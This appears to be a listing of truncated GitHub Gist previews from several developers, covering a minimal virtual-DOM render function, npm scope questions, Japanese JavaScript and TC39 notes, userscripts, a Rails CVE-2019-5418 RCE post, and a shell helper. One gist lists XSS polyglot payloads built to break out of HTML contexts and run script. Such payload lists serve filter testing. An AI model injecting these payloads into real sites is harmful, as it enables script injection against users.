developit

export const h=(t,p,...c)=>({t,p,c,k:p&&p.key})
export const render=(e,d,t=d.t||(d.t={}),p,r,c,m,y)=>
  // arrays
  e.map?e.map((e,p)=>render(e,d,t.o&&t.o[p])):
  // components
  e.t.call?(e.i=render((render.c=e).t(Object.assign({children:e.c},e.p),e.s=t.s||{},t=>
    render(Object.assign(e.s,t)&&e,d,e)),t.i||d,t&&t.i||{}),d.t=t=e):(
  // create notes
  m=t.d||(e.t?document.createElement(e.t):new Text(e.p)),
  // diff props

azu

📝 I submit the same text to GitHub Support.

---

I want to use same scope for npm package and GitHub Package Registry.

For example, @org scope exist in npm and GitHub.

• @org/foo-public package is public on npm registry
• @org/bar-private package is private on GitHub Package Registry

azu

jsprimerというJavaScriptの書籍を書いている。 これを書いてるときに参考にしているものを書いていく。

ECMAScript® Language Specification

ECMAScriptのLiving Standardな仕様書ページ。 スナップショットなECMAScriptの仕様書ページもあるけど、基本的にはLiving Standardの方しか見てない。

• Standard ECMA-262

azu

// ==UserScript==
// @name npm: package support types
// @namespace info.efcl
// @match https://www.npmjs.com/package/*
// @grant GM_xmlhttpRequest
// ==/UserScript==

// License: MIT © azu
const NAME = "$Greasemonkey:package support types$";
const fetchPackage = (packageName) => {

azu

// ==UserScript==
// @name geocities:redirect-to-wayback
// @namespace info.efcl.geocities-redirect-to-wayback
// @match http://www.geocities.jp/*
// @match https://www.geocities.jp/*
// @grant none
// ==/UserScript==

// See also
// https://qiita.com/__cooper/items/5ec5453c82fd3b03d7f6

azu

ECMAScript Proposal Diff between 2018-02-01 - 2019-02-01 by ECMAScript Proposal Diff Tool

• tc39-notes/es9 at master · rwaldron/tc39-notes
• agendas/2018 at master · tc39/agendas
• agendas/2019 at master · tc39/agendas

This changes is related with ECMAScript 2019 discussion.

New Proposals

azu

TC39MTG読書会

ECMAScript 2019の仕様に関する議事録を全部読む予定です。 (イベントじゃなくてただの個人的な予定です)

いつもインターネットの路上でやっている読書会です。

• 過去のイベント - TC39 MTG Notes MTG | Doorkeeper

日時

mala

Rails の CVE-2019-5418 は RCE (Remote code execution) です

2019-03-23 更新

• Remote Code Executionとして、Advisoryが更新された。
• https://groups.google.com/d/msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ
• Thanks to @sorah @tenderlove

前置き

michenriksen

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> 
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` 
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> 
javascript:`</template>\"///"//<

MaxMEllon

npm-remove-interactive()
{
  local k results
  while out=$(
    cat package.json \
          | jq '.devDependencies * .dependencies | keys[]' \
          | fzf --ansi --multi --no-sort --reverse --query="$q" \
                --print-query --expect=ctrl-d); do
    q=$(head -1 <<< "$out")
    k=$(head -2 <<< "$out" | tail -1)